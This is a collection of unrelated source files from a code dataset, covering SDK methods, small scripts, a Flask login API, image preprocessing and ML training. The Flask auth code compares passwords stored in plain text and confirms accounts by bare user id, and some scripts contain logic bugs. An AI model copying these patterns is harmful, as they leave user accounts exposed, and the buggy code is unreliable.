task(s).\n\n        ``POST /endpoint_manager/admin_resume``\n\n        :param task_ids: List of task ids to resume.\n        :type task_ids: iterable of str\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Resume tasks as admin \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        str_task_ids = [utils.safe_stringify(i) for i in task_ids]\n        log.info(f\"TransferClient.endpoint_manager_resume_tasks({str_task_ids})\")\n        data = {\"task_id_list\": str_task_ids}\n        path = self.qjoin_path(\"endpoint_manager\", \"admin_resume\")\n        return self.post(path, data=data, query_params=query_params)\n\n    #\n    # endpoint manager pause rule methods\n    #\n\n    def endpoint_manager_pause_rule_list(\n        self,\n        filter_endpoint: Optional[ID_PARAM_TYPE] = None,\n        query_params: Optional[Dict[str, Any]] = None,\n    ) -> IterableTransferResponse:\n        \"\"\"\n        Get a list of pause rules on endpoints that the current user has the\n        activity monitor effective role on.\n\n        ``GET /endpoint_manager/pause_rule_list``\n\n        :param filter_endpoint: An endpoint ID. Limit results to rules on endpoints\n            hosted by this endpoint. You must be an activity monitor on this endpoint,\n            not just the hosted endpoints.\n        :type filter_endpoint: str, optional\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`IterableTransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Get pause rules \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        log.info(\"TransferClient.endpoint_manager_pause_rule_list(...)\")\n        path = self.qjoin_path(\"endpoint_manager\", \"pause_rule_list\")\n        if query_params is None:\n            query_params = {}\n        if filter_endpoint is not None:\n            query_params[\"filter_endpoint\"] = utils.safe_stringify(filter_endpoint)\n        return IterableTransferResponse(self.get(path, query_params=query_params))\n
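    # A minimal usage sketch (hypothetical client tc and endpoint id ep_id),\n    # kept as a comment for illustration:\n    #\n    #     for rule in tc.endpoint_manager_pause_rule_list(filter_endpoint=ep_id):\n    #         print(rule[\"id\"], rule[\"message\"])\n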
\n    def endpoint_manager_create_pause_rule(self, data) -> response.GlobusHTTPResponse:\n        \"\"\"\n        Create a new pause rule. Requires the activity manager effective role\n        on the endpoint defined in the rule.\n\n        ``POST /endpoint_manager/pause_rule``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **Examples**\n\n        >>> tc = globus_sdk.TransferClient(...)\n        >>> rule_data = {\n        >>>   \"DATA_TYPE\": \"pause_rule\",\n        >>>   \"message\": \"Message to users explaining why tasks are paused\",\n        >>>   \"endpoint_id\": \"339abc22-aab3-4b45-bb56-8d40535bfd80\",\n        >>>   \"identity_id\": None,  # affect all users on endpoint\n        >>>   \"start_time\": None  # start now\n        >>> }\n        >>> create_result = tc.endpoint_manager_create_pause_rule(rule_data)\n        >>> rule_id = create_result[\"id\"]\n\n        **External Documentation**\n\n        See\n        `Create pause rule \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        log.info(\"TransferClient.endpoint_manager_create_pause_rule(...)\")\n        path = self.qjoin_path(\"endpoint_manager\", \"pause_rule\")\n        return self.post(path, data=data)\n\n    def endpoint_manager_get_pause_rule(\n        self, pause_rule_id, query_params: Optional[Dict[str, Any]] = None\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        Get an existing pause rule by ID. Requires the activity manager\n        effective role on the endpoint defined in the rule.\n\n        ``GET /endpoint_manager/pause_rule/``\n\n        :param pause_rule_id: ID of pause rule to get.\n        :type pause_rule_id: str\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Get pause rule \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        pause_rule_id = utils.safe_stringify(pause_rule_id)\n        log.info(f\"TransferClient.endpoint_manager_get_pause_rule({pause_rule_id})\")\n        path = self.qjoin_path(\"endpoint_manager\", \"pause_rule\", pause_rule_id)\n        return self.get(path, query_params=query_params)\n\n    def endpoint_manager_update_pause_rule(\n        self, pause_rule_id, data\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        Update an existing pause rule by ID. Requires the activity manager\n        effective role on the endpoint defined in the rule.\n        Note that non-updatable fields in data will be ignored.\n\n        ``PUT /endpoint_manager/pause_rule/``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **Examples**\n\n        >>> tc = globus_sdk.TransferClient(...)\n        >>> rule_data = {\n        >>>   \"message\": \"Update to pause, reads are now allowed.\",\n        >>>   \"pause_ls\": False,\n        >>>   \"pause_task_transfer_read\": False\n        >>> }\n        >>> update_result = tc.endpoint_manager_update_pause_rule(rule_id, rule_data)\n\n        **External Documentation**\n\n        See\n        `Update pause rule \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        pause_rule_id = utils.safe_stringify(pause_rule_id)\n        log.info(f\"TransferClient.endpoint_manager_update_pause_rule({pause_rule_id})\")\n        path = self.qjoin_path(\"endpoint_manager\", \"pause_rule\", pause_rule_id)\n        return self.put(path, data=data)\n\n    def endpoint_manager_delete_pause_rule(\n        self, pause_rule_id, query_params: Optional[Dict[str, Any]] = None\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        Delete an existing pause rule by ID. Requires the user to see the\n        \"editable\" field of the rule as True. 
\n def endpoint_manager_delete_pause_rule(\n self, pause_rule_id, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Delete an existing pause rule by ID. Requires the user to see the\n \"editable\" field of the rule as True. Any tasks affected by this rule\n will no longer be affected by it once it is deleted.\n\n ``DELETE /endpoint_manager/pause_rule/``\n\n :param pause_rule_id: The ID of the pause rule to delete.\n :type pause_rule_id: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Delete pause rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n pause_rule_id = utils.safe_stringify(pause_rule_id)\n log.info(f\"TransferClient.endpoint_manager_delete_pause_rule({pause_rule_id})\")\n path = self.qjoin_path(\"endpoint_manager\", \"pause_rule\", pause_rule_id)\n return self.delete(path, query_params=query_params)\n","sub_path":"src/globus_sdk/services/transfer/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":94056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"171403152","text":"path = input(\"Enter the path to the input.txt file: \")\n\nwith open('\\\\'.join([path, \"input.txt\"])) as numbers_file:\n numbers_text = numbers_file.read()\n\nsum = 0\nnumbers = numbers_text.split()\nfor number in numbers:\n sum = sum + int(number)\n\nwith open('\\\\'.join([path, \"output.txt\"]), \"w\") as result_file:\n result_file.write(str(sum))\n","sub_path":"lect_05/code/AniaNikolaieva - math and files/main_optimized_1.py","file_name":"main_optimized_1.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"543670326","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/boo_box/affiliates.py\n# Compiled at: 2009-06-12 09:57:11\namazon = 'amazonid'\namazon_uk = 'amazonukid'\namazon_jp = 'amazonjpid'\namazon_fr = 'amazonfrid'\namazon_de = 'amazondeid'\namericanas = 'americanasid'\nbuscape = 'buscapeid'\nebay = 'ebayid'\njacotei = 'jacoteiid'\nmercadolivre = 'mercadolivreid'\nsubmarino = 'submarinoid'\namericanas = 'americanasid'","sub_path":"pycfiles/boo_box-0.3.7-py2.4/affiliates.py","file_name":"affiliates.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"315187982","text":"from flask_restful import Resource, reqparse\nfrom models.usuario import UserModel\nfrom werkzeug.security import safe_str_cmp\nfrom flask_jwt_extended import create_access_token, jwt_required, get_raw_jwt\nfrom blacklist import BLACKLIST\nimport traceback\n\n\n#global variables\nattr = reqparse.RequestParser()\nattr.add_argument('login', type=str, required=True,\n help='The field login cannot be left blank')\nattr.add_argument('senha', type=str, required=True,\n help=\"The senha cannot be left blank\")\nattr.add_argument('email', type=str)\nattr.add_argument('ativado', type=bool)\n\n\nclass User(Resource):\n # /usuarios/{user_id}\n def get(self, user_id): # -----------------Get por ID\n user = UserModel.find_user(user_id)\n if user:\n return(user.json())\n return {'message': 'Usuário not found'}, 404\n\n @jwt_required\n def delete(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n try:\n user.delete_user()\n except:\n return {'message': 'An internal error occurred trying to delete usuário.'}, 500\n return {'message': 'Usuário deleted'}\n return {'message': 'Usuário not found.'}, 404\n\n\nclass UserRegister(Resource):\n # /cadastro\n def post(self):\n\n dados = attr.parse_args()\n if not dados.get('email') or dados.get('email') is None:\n return{\"message\": \"The field 'email' cannot be left blank.\"}, 404\n\n if UserModel.find_by_email(dados['email']):\n return {\"message\": \"The email '{}' already exists\".format(dados['email'])}, 400\n\n if UserModel.find_by_login(dados['login']):\n return {\"message\": \"The login '{}' already exists\".format(dados['login'])}, 400\n\n user = UserModel(**dados)\n user.ativado = False\n try:\n user.save_user()\n user.send_confirmation_email()\n except:\n user.delete_user()\n traceback.print_exc()\n return {'message': 'An internal server error has occurred.'}, 500\n return{'message': 'User created successfully!!!!!!!!!'}, 201\n\n\nclass UserLogin(Resource):\n\n @classmethod\n def post(cls):\n dados = attr.parse_args()\n\n user = UserModel.find_by_login(dados['login'])\n if user and safe_str_cmp(user.senha, dados['senha']):\n if user.ativado:\n token_de_acesso = create_access_token(identity=user.user_id)\n return {'access_token': token_de_acesso}, 200\n return{'message': 'User not confirmed.'}, 400\n return {'message': 'The username or password is incorrect'}, 401\n\n\nclass UserLogout(Resource):\n @jwt_required\n def post(self):\n jwt_id = get_raw_jwt()['jti'] # Token identifier\n BLACKLIST.add(jwt_id)\n return {'message': 'Logged out successfully!!!'}, 200\n\n\nclass UserConfirm(Resource):\n # Raiz_do_site/confirmacao/{user_id}\n @classmethod\n def get(cls, user_id):\n user = UserModel.find_user(user_id)\n\n if not user:\n return{\"message\": \"User id '{}' not found\".format(user_id)}, 404\n user.ativado = True\n user.save_user()\n return{\"message\": \"User id '{}' confirmed successfully.\".format(user_id)}, 200
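\n\n\n# --- Editorial sketch (not in the original file): one plausible way these\n# resources might be registered with flask_restful. The route strings and\n# the app wiring are illustrative assumptions, so the example is left as\n# comments rather than live code.\n#\n# from flask import Flask\n# from flask_restful import Api\n#\n# app = Flask(__name__)\n# api = Api(app)\n# api.add_resource(User, '/usuarios/<int:user_id>')\n# api.add_resource(UserRegister, '/cadastro')\n# api.add_resource(UserLogin, '/login')\n# api.add_resource(UserLogout, '/logout')\n# api.add_resource(UserConfirm, '/confirmacao/<int:user_id>')\n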
landmark point on image.\n \"\"\"\n for point in points:\n cv2.circle(image, (int(point[0]), int(\n point[1])), 3, (0, 255, 0), -1, 2)\n\n\ndef draw_box(image, box):\n x, y, w, h = box\n cv2.rectangle(image, (int(x), int(y)), (int(x+w), int(y+h)), (255, 255, 255), 2)\n\n\ndef get_facebox(pic_file, plot=False):\n pic_path = os.path.join(data_path, pic_file)\n name, _ = get_extension(pic_file)\n points = read_points(name + '.pts')\n img = cv2.imread(pic_path)\n # img = cv2.resize(img, standard_size)\n rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n detector = MTCNN()\n faces = detector.detect_faces(rgb_img)\n result = None\n for face in faces:\n box = face['box']\n # box = box_in_range(box, img.shape)\n # box = rectify_box(box, img.shape)\n\n if points_in_box(points, box):\n box = box_in_range(box, img.shape)\n box = rectify_box(box, img.shape)\n result = box\n\n if result == None:\n return None\n\n if result[1] != 0:\n result[1] += int(0.1 * result[3])\n\n if plot:\n draw_landmark_point(img, points)\n draw_box(img, result)\n cv2.imshow('img', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return result\n\n\ndef crop_and_scale(file_name, facebox, points):\n x, y, w, h = facebox\n # img = cv2.imread(os.path.join(data_path, file_name))\n # face = img[int(y):int(y+h), int(x):int(x+w)]\n # face = cv2.resize(face, standard_size)\n # cv2.imwrite(os.path.join(data_path, 'cropped', file_name), face)\n name, _ = get_extension(file_name)\n pts_path = os.path.join(data_path, 'cropped', name + '.pts')\n pts_file = open(pts_path, 'w+')\n for p in points:\n p[0] -= x\n p[1] -= y\n scaling_factor = w/standard_size[0]\n p = p/scaling_factor\n pts_file.write(p)\n pts_file.write('\\n')\n\n pts_file.close()\n\n\n\ndef scale_points(points, facebox):\n x, y, w, h = facebox\n for p in points:\n p[0] -= x\n p[1] -= y\n\n\ndef main():\n for _,_,files in os.walk(data_path):\n for f in files:\n name, ext = get_extension(f)\n if ext == 'pts':\n continue\n facebox = get_facebox(f, plot=False)\n points = read_points(name + '.pts')\n if facebox == None or not points_in_box(points, facebox):\n os.remove(os.path.join(data_path, f))\n os.remove(os.path.join(data_path, name+'.pts'))\n else:\n crop_and_scale(f, facebox, points)\n print(f)\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"600887323","text":"from GuardShiftSched import GuardSched\nfh = open('Day4Puzzle.txt')\nfileContents = []\n\nfor x in fh:\n fileContents.append(x)\n\nfh.close()\n\nsortedContents = sorted(fileContents)\n\nguardSched = GuardSched()\n\nfor x in sortedContents:\n guardSched.addRecToList(x)\n\nguardSched.createSchedule()\nguardSched.findSleepingMostSpecMin()","sub_path":"Python/Advent Of Code/2018/Day 4/Day4Ex2.py","file_name":"Day4Ex2.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"291361270","text":"import nltk\n\ntry:\n nltk.data.find('tokenizers/punkt')\nexcept LookupError:\n nltk.download('punkt')\n\ndef chrf(trans_file, pred_file):\n refs = []\n with open(trans_file, encoding=\"utf8\") as test:\n for line in test:\n line = line.strip().lower().split()\n refs.append(line)\n\n preds = []\n with open(pred_file, encoding=\"utf8\") as pred:\n for line in pred:\n line = line.strip().lower().split()\n preds.append(line)\n\n score = 
nltk.translate.chrf_score.corpus_chrf(refs, preds)\n return score","sub_path":"evaluation/metrics/chrf.py","file_name":"chrf.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"485638695","text":"'''\nAuthor: Puffrora\nDate: 2021-11-26 23:50:44\nLastModifiedBy: Puffrora\nLastEditTime: 2021-11-27 00:11:27\n'''\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def goodNodes(self, root: TreeNode) -> int:\n\n res = 0\n\n def dfs(node, cur_max):\n nonlocal res\n if not node:\n return\n if node.val >= cur_max:\n res += 1\n\n dfs(node.left, max(cur_max, node.val))\n dfs(node.right, max(cur_max, node.val))\n\n dfs(root, root.val)\n\n return res\n","sub_path":"Leetcode/leetcode1448 统计二叉树中好节点的数目.py","file_name":"leetcode1448 统计二叉树中好节点的数目.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"369290028","text":"\"\"\"\nLab_Python_06\nPart 1\n\"\"\"\n\nimport datetime\n\n\"\"\"\nWhatever the datastructure you choose,\nit should represent the following data:\n\nplayer\t\t| date\t\t| score\n_______________________________________\nrooney\t\t| 6/23/2012\t| 2\nrooney\t\t| 6/25/2012\t| 2\nronaldo\t\t| 6/19/2012\t| 0\nronaldo\t\t| 6/20/2012\t| 3\ntorres\t\t| 6/21/2012\t| 0\ntorres\t\t| 6/21/2012\t| 1\n\"\"\"\nimport time\nfrom datetime import date\n## create the player_stats data structure\n\nplayer_stats = {\n 'rooney' :[(date(2012,6,23),2),\n (date(2012,6,25),2)],\n 'ronaldo':[(date(2012,6,19),0),\n (date(2012,6,20),3)],\n 'torres' :[(date(2012,6,21),0),\n (date(2012,6,21),1)]\n }\n\n\n## implement highest_score\ndef highest_score(player_stats):\n highest_score = 0\n highest_scorer = []\n for i in player_stats:\n for j in player_stats[i]:\n if (j[1] > highest_score):\n highest_score = j[1]\n highest_scorer = (i,j[0],j[1])\n return highest_scorer\n\n## implement highest_score_for_player\ndef highest_score_for_player(player_stats,player):\n highest_score_for_player = 0\n\n for i in player_stats[player]:\n if (i[1] > highest_score_for_player):\n highest_score_for_player = i[1]\n return highest_score_for_player\n\n## implement highest_scorer\ndef highest_scorer(player_stats):\n highest_scorer = \"\"\n score = 0\n list1={}\n for i in player_stats:\n sum1 = 0\n for j in range(len(player_stats[i])):\n sum1 = sum1 + player_stats[i][j][1]\n list1[i]=sum1\n for i in list1:\n if (list1[i] >= score):\n highest_scorer = i\n return highest_scorer\n\n\"\"\"\nDictionary with Tuples:\nThe name of the player serves as a Key which has\na list of tuples of when the players played and\nthe goals scored\n\nthis way we can refrence the date the goals were\nscored by the players\n\"\"\"\n","sub_path":"Lab06_part1.py","file_name":"Lab06_part1.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"236896313","text":"x, y = map(int, input().split())\n\nif (x+y)%3 != 0:\n print(0)\n exit()\n\nm = (2*x - y)//3\nn = (2*y - x)//3\n\nif m<0 or n<0:\n print(0)\n exit()\n\n\"\"\"Combination(mod付き)の高速計算\"\"\"\ndef extgcd(a, b):\n if b == 0:\n return a, 1, 0\n else:\n d, x, y = extgcd(b, a % b)\n x -= (a // b) * y\n return d, y, x\n \ndef modinv(a, mod): \n return extgcd(a, mod)[1] % mod\n\ndef modcomb(n, k, mod):\n q, a = 
1, 1\n for i in range(n-k+1, n+1):\n q = (q * i) % mod\n for i in range(2, k+1):\n a = (a * i) % mod\n return int(q * modinv(a, mod) % mod)\n\nans = modcomb(n+m, m, 10**9+7)\nprint(ans)","sub_path":"atcoder/2019/ABC/1116_abc145/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"572536674","text":"'''\nThings this file should do\n 1. sort the list of cluster ids\n 2. initialize a 'q_clust' array\n 3. fill array by testing if cluster has multiple particles\n'''\nimport numpy as np\n\n# Read in the clust ID array\ndef binaryCluster( ids, clust_num, size_min=1000 ):\n \n part_num = len(ids)\n sort = np.sort(ids)\n biclust = np.zeros((clust_num), dtype=np.bool_)\n index = 0\n for a in range(0, clust_num):\n add_clust = 0\n while 1:\n add_clust += 1\n if index == part_num: # break if index is too large\n break\n if sort[index] != a: # break if ID changes\n break\n if add_clust == 1: # all particles appear once\n biclust[a] = 0\n if add_clust > size_min: # only multiple ids appear twice\n biclust[a] = 1\n index += 1 # increment index\n\n return biclust\n","sub_path":"wdd_pkg/qclust.py","file_name":"qclust.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"316062735","text":"from bac.bin import sc\n\ndef test_delete_args():\n s = sc.Sc()\n assert s._delete_arg_buffer(service_name='DeleteThisService') == ['delete', '\"DeleteThisService\"']\n\ndef test_create_args():\n s = sc.Sc()\n arg_buffer = s._create_arg_buffer(service_name='DeleteThisService', bin_path=r'c:\\windows\\system32\\notepad.exe')\n assert arg_buffer == ['create', 'DeleteThisService', 'binPath=', r'\"c:\\windows\\system32\\notepad.exe\"']\n \n arg_buffer = s._create_arg_buffer(service_name='svnserve', \n bin_path=r'\\\"C:\\Program Files\\CollabNet Subversion Server\\svnserve.exe\\\" --service -r \\\"C:\\my repositories\\\"',\n display_name=\"Subversion Server\",\n depend='Tcpip',\n start='auto')\n print(\" \".join(arg_buffer))\n assert \" \".join(arg_buffer) == r'create svnserve binPath= \"\\\"C:\\Program Files\\CollabNet Subversion Server\\svnserve.exe\\\" --service -r \\\"C:\\my repositories\\\"\" start= auto depend= Tcpip DisplayName= \"Subversion Server\"'","sub_path":"tests/unit/test_bin_sc.py","file_name":"test_bin_sc.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"452714957","text":"import discord, aiohttp, asyncio, functools, json, io\nfrom discord.ext import commands\nfrom logging import Formatter\nfrom textwrap import TextWrapper\nfrom xml.etree import ElementTree\nfrom . 
import __version__\n\nclass NvFormatter(Formatter):\n\tLINE_WIDTH = 100\n\twrapper = TextWrapper(width = LINE_WIDTH)\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\n\tdef format(self, record):\n\t\tmessage = record.getMessage()\n\t\t\n\t\tif \"\\n\" not in message[:self.LINE_WIDTH + 80]:\n\t\t\tlines = self.wrapper.wrap(message)\n\t\telse:\n\t\t\tlines = message.splitlines()\n\t\t\t\n\t\tmessage = f\"\\n{' ' * 7} | {' ' * 15} | \".join(lines)\n\t\treturn f\"{record.levelname:7} | {record.name:15} | {message}\"\n\t\nclass BadMessageResponse(Exception):\n\tpass\n\t\t\nclass CommandCancelled(commands.CommandError):\n\t@classmethod\n\tasync def create(self, message, ctx):\n\t\tawait ctx.send(f\":x: | {message}.\")\n\t\treturn CommandCancelled(message)\n\t\t\nclass CustomCommandError(commands.CommandError):\n\tdef __init__(self, title, desc, *args, **kwargs):\n\t\tself.title = title\n\t\tself.desc = desc\n\t\t\nUSER_AGENT = f\"{aiohttp.http.SERVER_SOFTWARE} Heraldtron/{__version__} (like Herald 3.0)\" #for fun\n\t\nasync def get_bytes(session, url, **kwargs):\n\tasync with session.get(url) as source:\n\t\timage = await source.read(**kwargs)\n\t\treturn io.BytesIO(image)\n\t\nasync def get_json(session, url, **kwargs):\n\tasync with session.get(url) as source:\n\t\treturn await source.json(**kwargs)\n\t\t\t\nasync def get_text(session, url, **kwargs):\n\tasync with session.get(url) as source:\n\t\treturn await source.text(**kwargs)\t\n\t\t\nasync def get_channel(bot, channel):\n\treturn bot.get_channel(channel) or await bot.fetch_channel(channel)\n\t\nasync def get_guild(bot, guild):\n\treturn bot.get_guild(guild) or await bot.fetch_guild(guild)\n\t\nasync def get_user(bot, user):\n\treturn bot.get_user(user) or await bot.fetch_user(user)\n\t\nasync def unqualify_name(bot, name, discriminator):\n\treturn discord.utils.find(\n\t\tlambda m: m.name == name and m.discriminator == discriminator, bot.users\n\t)\n\t\nasync def check_is_owner(ctx):\n\tif not await ctx.bot.is_owner(ctx.author):\n\t\traise commands.NotOwner(\"Owner-only mode is enabled\")\n\t\treturn False\n\treturn True\n\t\nasync def check_limited(ctx):\n\tif not ctx.guild: return True\n\t\n\tif ctx.bot.guild_cache[ctx.guild.id][1][2]: \n\t\traise CustomCommandError(\n\t\t\t\"Command prohibited\",\n\t\t\t\"This command is not allowed on this server.\"\n\t\t)\n\t\treturn False\n\t\n\treturn True\n\t\ndef parse_xml(text_string, root):\n\treturn ElementTree.fromstring(text_string).find(root)\n\n@functools.cache\t\ndef pronounise(word):\n\tpron = \"an\" if word.strip()[0].upper() in \"AEIOU1\" else \"a\"\n\treturn f\"{pron} {word}\"\n\t\n@functools.cache\ndef stdtime(value):\n\treturn f\"{value.day} {value:%B} {value.year}\"\n\nasync def _typing(self, ctx): \n\tawait ctx.trigger_typing()\n\t\ntrigger_typing = commands.before_invoke(_typing)","sub_path":"ht/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"419830838","text":"# import MySQLdb\n\ndef getFollowingInformation(client, user_id, followingCount):\n\n followingsList = list()\n user_url = '/users/' + str(user_id) + '/followings'\n \n for i in range(0, followingCount, 50):\n followings = client.get(user_url, offset=i)\n followingsList.append(followings)\n \n return followingsList\n \ndef insertDB(user_id, followingsList):\n\n database = MySQLdb.connect(host=\"127.0.0.1\", user = \"root\", passwd=\"\", db = \"soundcloud\")\n 
database.set_character_set('utf8') \n cursor = database.cursor()\n \n for followings in followingsList:\n \n for following in followings:\n \n query = \"INSERT INTO T_FOLLOWINFO (FOLLOWUSER) VALUES (%s)\"\n FOLLOWUSER = following.id\n values = (FOLLOWUSER)\n cursor.execute(query, (values,))\n \n query = \"INSERT INTO T_ACTIVITY (USERID, ACTIVITYTYPE, FOLLOWID) VALUES (%s, %s, %s)\"\n \n USERID = user_id\n ACTIVITYTYPE = \"10\"\n FOLLOWID = cursor.lastrowid\n \n values = (USERID, ACTIVITYTYPE, FOLLOWID)\n cursor.execute(query, values)\n \n cursor.close()\n database.commit()\n database.close()\n \nfrom py2neo import Graph\n \ndef add2Neo4J(user_id, followingsList):\n \n graph = Graph()\n\n for followings in followingsList:\n for following in followings.collection:\n tx = graph.cypher.begin()\n tx.append(\"MATCH (u1:User),(u2:User) WHERE u1.id = {A} AND u2.id = {B} CREATE UNIQUE (u1)-[:FOLLOWS]->(u2)\", \n {\"A\":user_id, \"B\":following.id})\n tx.process()\n tx.commit()\n ","sub_path":"following_information.py","file_name":"following_information.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"471837861","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 28 09:31:30 2019\r\n\r\n@author:vinayak sable \r\n\"\"\"\r\n\r\nimport numpy as np # dealing with arrays\r\nimport os # dealing with directories\r\nfrom random import shuffle # mixing up or currently ordered data that might lead our network astray in training.\r\nimport glob\r\nimport cv2\r\n\r\npath = r'Path of folder contain fruits images fordels'\r\nIMG_SIZE = 400\r\nLR = 1e-3\r\n\r\nMODEL_NAME = 'Fruits_dectector-{}-{}.model'.format(LR, '5conv-basic')\r\nno_of_fruits=7\r\npercentage=0.3\r\nno_of_images=100\r\n\r\ndef create_train_data(path):\r\n training_data = []\r\n folders=os.listdir(path)[0:no_of_fruits]\r\n for i in range(len(folders)):\r\n label = [0 for i in range(no_of_fruits)]\r\n label[i] = 1\r\n print(folders[i])\r\n k=0\r\n for j in glob.glob(path+\"\\\\\"+folders[i]+\"\\\\*.jpg\"): \r\n if(k==no_of_images):\r\n break\r\n k=k+1\r\n img = cv2.imread(j)\r\n img = cv2.resize(img, (IMG_SIZE,IMG_SIZE))\r\n training_data.append([np.array(img),np.array(label)])\r\n np.save('training_{}_{}_{}.npz'.format(no_of_fruits,no_of_images,IMG_SIZE),training_data)\r\n shuffle(training_data)\r\n return training_data,folders\r\n\r\n\r\nimport tflearn\r\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\r\nfrom tflearn.layers.core import input_data, dropout, fully_connected\r\nfrom tflearn.layers.estimator import regression\r\n\r\n\r\n#model building\r\nimport tensorflow as tf\r\ntf.reset_default_graph()\r\nconvnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 3], name='input')\r\n\r\nconvnet = conv_2d(convnet, 32, 5, activation='relu')\r\n\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\nconvnet = conv_2d(convnet, 64, 5, activation='relu')\r\n\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\nconvnet = conv_2d(convnet, 128, 5, activation='relu')\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\nconvnet = conv_2d(convnet, 64, 5, activation='relu')\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\n\r\nconvnet = conv_2d(convnet, 32, 5, activation='relu')\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\nconvnet = fully_connected(convnet, 1024, activation='relu')\r\nconvnet = dropout(convnet, 0.8)\r\n\r\nconvnet = fully_connected(convnet, no_of_fruits, activation='softmax')\r\nconvnet = regression(convnet, optimizer='adam', learning_rate=LR, 
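# --- Editorial note (not in the original file): the `import MySQLdb` line at\n # the top of this file is commented out, so insertDB would raise a NameError\n # when called; re-enabling that import is required for this code path.\n 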
loss='categorical_crossentropy', name='targets')\r\n\r\nmodel = tflearn.DNN(convnet, tensorboard_dir='log')\r\n \r\n\r\n#data loading\r\ntraining_data,labels=create_train_data(path)\r\ntraining_data=np.load('training_{}_{}_{}.npz'.format(no_of_fruits,no_of_images,IMG_SIZE))\r\na=int(len(training_data)*percentage)\r\ntrain = training_data[:-a]\r\ntest=training_data[-a:]\r\n\r\nX = np.array([i[0] for i in train]).reshape(-1,IMG_SIZE,IMG_SIZE,3)\r\nY = [i[1] for i in train]\r\n\r\ntest_x = np.array([i[0] for i in test]).reshape(-1,IMG_SIZE,IMG_SIZE,3)\r\ntest_y = [i[1] for i in test]\r\n\r\nmodel.fit({'input': X}, {'targets': Y}, n_epoch=10, validation_set=({'input': test_x}, {'targets': test_y}), \r\n snapshot_step=500, show_metric=True, run_id=MODEL_NAME)\r\n\r\nmodel.save(MODEL_NAME)\r\n\r\n\r\n\r\nfrom calorie import calories\r\ntest_data='Image path for testing'\r\nimg=cv2.imread(test_data)\r\nimg1=cv2.resize(img,(IMG_SIZE,IMG_SIZE))\r\nmodel_out=model.predict([img1])\r\nresult=np.argmax(model_out)\r\nname=labels[result]\r\ncal=round(calories(result+1,img),2)\r\n\r\n\r\nimport matplotlib.pyplot as 